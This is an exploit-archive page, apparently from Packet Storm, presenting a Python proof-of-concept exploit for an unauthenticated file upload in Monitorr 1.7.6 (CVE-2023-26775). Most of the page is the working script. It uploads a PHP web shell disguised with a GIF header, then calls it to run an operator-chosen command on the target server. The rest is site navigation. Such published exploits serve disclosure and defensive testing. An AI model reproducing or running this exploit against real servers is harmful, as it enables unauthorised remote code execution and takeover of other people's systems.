Monitorr 1.7.6 Shell Upload

Monitorr 1.7.6 Shell Upload: Posted Feb 10, 2023; Authored by Achuth V P; Monitorr version 1.7.6 remote shell upload proof of concept exploit written in Python.; tags | exploit, remote, shell, proof of concept, python; advisories | CVE-2023-26775; SHA-256 | 01595757eb8db499b07b46be3566c6b8bae226e88e11b02fea9bef8418392389; Download | Favorite | View

Monitorr 1.7.6 Shell Upload

# Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability
# CVE: CVE-2023-26775

import requests
import random
import string
#from requests.auth import HTTPBasicAuth
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT

def payL():
    fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'
    tf1=requests.post(url+'/assets/php/upload.php',
        files=(
            ('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),))
    tf2=requests.get(url+'/assets/data/usrimg/'+fileName)

    print(tf2.text)

def sig():
    SIG  = SB+FY+"         "+FR+".-----..___.._____.      "+FY+"\n"
    SIG += FY+"         |  ..   >||__-__-_|         \n"
    SIG += FY+"         "+FR+"|  |.'  ,||_______          "+FY+"\n"
    SIG += FY+"         |    _ < ||__-__-_|"+FR+"*  *  *"+FY+" \n"
    SIG += FY+"         |  |\  \ ||__-__-_\n"
    SIG += FY+"         "+FR+"|___ \_ \||_______| "+FY+"\n"
    SIG += FY+"\n"+"    _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST
    return SIG

def argsetup():
    about  = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST
    return about

if __name__ == "__main__":
    header = SB+FT+"\n"+'             '+FR+'retrymp3\n'+ST
    print(header)
    print(sig())
    print(argsetup())
    #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    url=input("Enter the base url: ")
    cmd=input("Command: ")
    payL()

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Monitorr 1.7.6 Shell Upload

Monitorr 1.7.6 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Monitorr 1.7.6 Shell Upload

Share This

Monitorr 1.7.6 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems